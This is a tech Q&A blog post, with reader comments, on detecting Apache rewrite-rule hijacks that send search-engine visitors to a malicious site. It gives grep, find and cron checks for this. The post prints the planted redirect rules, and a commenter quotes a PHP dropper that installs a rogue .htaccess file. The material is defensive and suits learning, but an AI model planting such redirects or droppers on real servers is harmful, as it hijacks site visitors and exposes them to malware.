How can people hack my Apache server with Rewrite rules?

A geeky friend of mine just told me that he's been seeing hackers slip a few lines of code into their Apache web server configuration and have all their traffic redirected to porn sites. Now I'm paranoid! How can I detect if this has happened to my own server?


Dave's Answer:

This happened to a pal of mine just a few days ago, actually, and at first we were convinced someone had hacked Google itself, because the symptoms were that when someone typed in his URL directly, they went to his site, but if they clicked on a search match on Google, they were redirected to a site that attempted to give you a virus.

Digging around a bit, however, and chatting with various people on Twitter.com led us to suspect that there was something wonky with his server, not Google. I mean, in reality, it's pretty darn unlikely that someone's going to hack Google...

Since the malicious redirect wasn't universally experienced, we knew that it couldn't be a DNS hijacking or similar (where your domain name is spontaneously assigned to the IP address of a porn site, etc). So it had to be something on the server itself.

A bit of digging in the httpd.conf Apache web server configuration file revealed the offending code:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://nefarious IP address/in.html?s=ipw2 [R,L]
Errordocument 404 http://nefarious IP address/in.html?s=ipw2_err

What this does is take any request that arrives with a referrer of Google, AOL, MSN, Altavista, Ask or Yahoo (i.e., the major search engines) and rewrite it into a redirect to the nefarious IP address URL; the ErrorDocument line sends 404 errors to the same place. Definitely not good!

But how to detect it? Well, one easy way is to just use the Unix/Linux command line tool "grep" to search and quickly view all rewrite rules in your configuration file, screening out those that don't also have "http:" in them. When I do that with my highly complex 2400-line server configuration, here's what I see:

$ grep -i rewriterule /usr/local/apache/conf/httpd.conf | grep http:
RewriteRule ^/index.xml$ http://feeds.feedburner.com/AskDaveTaylor [R,L]
RewriteRule ^/index.rdf$ http://feeds.feedburner.com/AskDaveTaylor [R,L]

Those are both clean because it's how I let the popular Feedburner service catch my RSS feed URLs. Nothing suspicious like my friend had in his "httpd.conf" file.

One more tweak and you have a simple script that, run from a cron job, would email you if any of this bad code showed up, since cron mails a job's output to its owner (Linux geeks know what I'm talking about):

#!/bin/sh
# Report any RewriteRule that redirects to an external URL, ignoring the
# known-good Feedburner rules; cron mails whatever this prints to the job owner.
conf=/usr/local/apache/conf/httpd.conf
grep -i rewriterule $conf | grep http: | grep -v feedburner
exit 0

Easy enough, right?

Now it turns out that there's one more sneaky way that a hacker could slip this code onto your server: with a ".htaccess" file in the main directory or a subdirectory of your Web site itself, rather than in the central "httpd.conf" file.

You can check for this from the command line again:

$ cd /usr/local/apache/htdocs
$ find . -name ".htaccess" -print

Before you panic on matches, realize that this is also how you most commonly password protect a directory on a Web server. In that instance, the file looks like this:

AuthUserFile /etc/.htpasswd
AuthGroupFile /dev/null
AuthName "Growing Your Biz w/ Google Course"
AuthType Basic
<Limit GET>
require user taylor
require user google
require user steven
</Limit>

(You can learn more about password protecting Web site directories here: how to password protect a directory in Apache with .htaccess)

Again, you can just look for the "http:" pattern, though this is a bit more complicated a command than last time:

$ grep http: $(find . -name ".htaccess" -print)
$

Phew. I'm clean. You should check for this too. In fact, it might be a smart command to add to your simple admin script that I show above.
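Here is one way to fold both checks (the httpd.conf grep and the .htaccess sweep) into a single script. This is an added example, not Dave's script: it flags any RewriteRule or ErrorDocument that points at an external URL unless the host is on a small allowlist, and it builds a constructed config tree to scan, so the paths and the 203.0.113.9 address are placeholders.

```shell
#!/bin/sh
# Added example (not Dave's script): scan httpd.conf plus every .htaccess
# under the document root for RewriteRule/ErrorDocument lines that redirect
# to an external http(s) URL, ignoring hosts on an allowlist. The paths and
# the 203.0.113.9 address are constructed placeholders.

# Hosts you legitimately redirect to (Feedburner here); anything else is flagged.
ALLOWED_HOSTS='feeds.feedburner.com'

# Print each suspicious directive as "file:line:directive"; return 1 if any found.
scan_apache_conf() {
    conf="$1"; docroot="$2"
    files=$(printf '%s\n' "$conf"; find "$docroot" -name .htaccess -print)
    hits=$(printf '%s\n' "$files" | while IFS= read -r f; do
        [ -f "$f" ] || continue
        # -i: Apache directives are case-insensitive (Errordocument == ErrorDocument)
        grep -n -i -E '^[[:space:]]*(RewriteRule|ErrorDocument)[[:space:]].*https?://' "$f" \
            | grep -v -E "https?://($ALLOWED_HOSTS)(/|[[:space:]]|$)" \
            | sed "s|^|$f:|"
    done)
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# Build a constructed config tree (one clean Feedburner rule, the hijack rules
# from the article, and a rogue .htaccess in a subdirectory) and scan it.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/htdocs/blog"
    cat > "$tmp/httpd.conf" <<'EOF'
RewriteEngine On
RewriteRule ^/index.xml$ http://feeds.feedburner.com/AskDaveTaylor [R,L]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC]
RewriteRule .* http://203.0.113.9/in.html?s=ipw2 [R,L]
Errordocument 404 http://203.0.113.9/in.html?s=ipw2_err
EOF
    cat > "$tmp/htdocs/blog/.htaccess" <<'EOF'
RewriteRule .* http://203.0.113.9/in.html [R,L]
EOF
    scan_apache_conf "$tmp/httpd.conf" "$tmp/htdocs"
    rc=$?
    rm -rf "$tmp"
    return "$rc"
}

demo || echo "suspicious redirects found; review the lines above"
```

Point scan_apache_conf at your real httpd.conf and document root from cron; its non-zero exit and printed lines are what you want mailed to you.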

Hope that helps you out!

Many thanks to Greg Hughes for his help in isolating and sharing the dastardly code snippet shown above.

Categorized: Blogs and Blogging (Article 8450)
Tagged: apache, hacking, http.conf, site hijacking
Reader Comments To Date: 8

paris said, on August 20, 2008 11:16 AM:

Hi Dave,

Great article - thanks.
I've recently seen this popping up in .htaccess files. Do you have any info or links regarding what exploits people are using to do this in the first place?

Dave Cole said, on August 21, 2008 8:32 AM:

I agree with Paris; how are black hats getting into httpd.conf files or .htaccess files in the first place? SSH root access? Oh, and I also agree: it is otherwise a good article. Thanks.

Greg said, on November 18, 2008 1:37 PM:

I add to the thanks for writing this. I also ask for the same additional info on how this can be stopped in the first place. I understand from some sites that poorly written PHP code can lead a person to discover the file structure, but if the sites are secure, how are they able to do anything with that info? What can we do to stop them from using bad code on a user's site against us the whole server?

Dardar said, on December 17, 2008 2:49 PM:

Can anybody tell me why I can no longer get to www.youtube.com? Instead I get UK.youtube.com, and also many other google searches where the search gives normal websites, homepages, etc. as answers, when I click on them in Google search, I'm instead sent to some "parked" looking spammy type web pages. Is this my Google/local computer with a malware problem or is it the websites? I can't believe youtube (usa) has this problem but I sure can't reach it. Something to do with Hosts file? Don't know what that is... please feel free to email me or respond here. Thanks Dardar

Johann said, on January 29, 2009 4:58 PM:

Thanks for posting this! I was scratching my head wondering how Google could be hacked and why only for my site. This information was a lifesaver!

help said, on February 11, 2009 4:24 PM:

I've been dealing a lot with this type of hack. Now it seems that the directory permissions are being changed to 777 when the htaccess file is uploaded. It seems they are uploading a file called m.php:
<?php
// Rename the uploaded placeholder "htt" into a live .htaccess file,
// then delete this dropper and report success.
rename("htt", ".htaccess");
unlink("m.php");
echo "OK";
?>

This file renames a blank file called htt to .htaccess.

Khalid said, on January 6, 2010 11:58 PM:

This is a nice explanation - many thanks!

But like a few others who said the same thing, I'm wondering HOW someone could actually place a file when they don't have a valid password...

Thank you for your time!

Mark said, on April 14, 2011 6:10 PM:

Just in case anyone else stumbles across this again, we just had the same thing happen to our site. Turns out the intruder used a brute force attack to gain access to ftp (we noticed access attempts in the ftp logs dating back 6 months). Once in, an .htaccess file was dropped into every directory, not just root.

© 2002 - 2013 by Dave Taylor. All Rights Reserved.
